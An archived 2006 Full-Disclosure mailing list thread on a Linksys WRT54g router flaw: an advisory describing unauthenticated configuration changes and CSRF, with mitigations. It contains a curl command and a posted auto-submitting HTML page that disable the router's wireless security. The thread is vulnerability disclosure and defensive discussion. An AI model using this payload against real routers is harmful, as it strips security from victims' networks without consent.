lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Fri, 10 Nov 2006 15:04:56 -0800
From: "Rob Thompson" <my.security.lists@...il.com>
To: pagvac <unknown.pentester@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, Ginsu Rabbit <ginsurabbit@...mail.com>
Subject: Re: linksys WRT54g authentication bypass

The firmware listed in the post is a very old firmware and should no
longer be affected if you update to the more current release of
4.71.1.

Also, I would recommend checking out Thibor's release instead.  It's a
much more robust release.

http://www.thibor.co.uk

Hope that this helps out a little bit.

Rob.

On 11/4/06, pagvac <unknown.pentester@...il.com> wrote:
> Sorry I'm replying to this post after so long, but I was bored this
> morning and decided to create a specially-crafted HTML page that would
> allow me to replicate the unauth CSRF attack described by Ginsu
> Rabbit. Very interesting vuln btw :-)
>
> The following is the code for the specially-crafted HTML page.
> Unfortunately, I do not have a vulnerable Linksys router to test this,
> so I simply strictly followed the structure of the POST request as
> described in the advisory. Hopefully it should work.
>
> It'd be cool if someone could test this against a vulnerable model.
>
> Here is an on-line copy:
>
> http://ikwt.com/projects/linksys/BID19347_test.html
>
>
> <html>
>
> <head><title>BID 19347 specially-crafted html page - vuln found by
> Ginsu Rabbit</title></head>
>
> <body>
>
> <form action="http://192.168.0.1/Security.tri" method="POST">
> <input type="hidden" name="SecurityMode" value="0">
> <input type="hidden" name="layout" value="en">
> </form>
>
> <script>document.forms[0].submit();</script>
>
> </body>
> </html>
>
> On 8/4/06, Ginsu Rabbit <ginsurabbit@...mail.com> wrote:
> > I'm having some trouble believing this hasn't been reported before.  If you
> > have a linksys router handy, please check to see whether it is vulnerable to
> > this attack.  It's possible that all of the linksys router web UIs have the
> > same bug.  Hopefully the problem is isolated to one particular model or
> > firmware revision.
> >
> > I. DESCRIPTION
> >
> > Tested product: Linksys WRT54g home router, firmware revision 1.00.9.
> >
> > Problem #1: No password validation for configuration settings.
> >
> > The WRT54g does not attempt to verify a username and password when
> > configuration settings are being changed.  If you wish to read configuration
> > settings, you must provide the administrator ID and password via HTTP basic
> > authentication.  No similar check is done for configuration changes.
> >
> > This request results in a user-id and password prompt:
> > GET /wireless.htm
> >
> > This request disables wireless security on the router, with no password
> > prompt:
> > POST /Security.tri
> > Content-Length: 24
> >
> > SecurityMode=0&layout=en
> >
> > Problem #2: Cross-site request forgery
> >
> > The web administration console does not verify that the request to change
> > the router configuration is being made with the consent of the
> > administrator.  Any web site can force a browser to send a request to the
> > linksys router, and the router will accept the request.
> >
> >
> > II. Exploitation
> >
> > The combination of these two bugs means that any internet web site can
> > change the configuration of your router.  Recently published techniques for
> > port-scanning and web server finger printing via java and javascript make
> > this even easier.  The attack scenario is as follows:
> >
> > - intranet user visits a malicious web site
> > - malicious web site returns specially crafted HTML page
> > - intranet user's browser automatically sends a request to the router that
> > enables the remote administration interface
> > - the owner of the malicious web site now has complete access to your router
> >
> > I'm not going to share the "specially crafted HTML page" at this time, but
> > it isn't all that special.
> >
> >
> > III. DETECTION
> >
> > If your router is vulnerable, the following curl command will disable
> > wireless security on your router.  Tests for other router models and
> > firmware revisions may be different:
> >
> > curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri
> >
> >
> > IV. MITIGATION
> >
> > 1) Make sure you've disabled the remote administration feature of your
> > router.  If you have this "feature" enabled, anybody on the internet can
> > take control of the router.
> >
> > 2) Change the IP address of the router to a random value, preferably in the
> > range assigned to private networks.  For example, change the IP address to
> > 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive.  This
> > makes it more difficult for an attacker to forge the request necessary to
> > change the router configuration.  This mitigation technique might not help
> > much if you have a java-enabled browser, because of recently published
> > techniques for determining gateway addresses via java applets.
> >
> > 3) Disable HTTP access to the administration interface of the router,
> > allowing only HTTPS access.  Under most circumstances, this will cause the
> > browser to show a certificate warning before the configuration is changed.
> >
> > V. VENDOR NOTIFICATION
> >
> > Linksys customer support was notified on June 24, 2006.
> > Full disclosure on August 4, 2006.
> >
> > --
> > GR
> >
> > _________________________________________________________________
> > Is your PC infected? Get a FREE online computer virus scan from McAfee(r)
> > Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
> pagvac
> [http://ikwt.com/]
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>


-- 
Rob

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ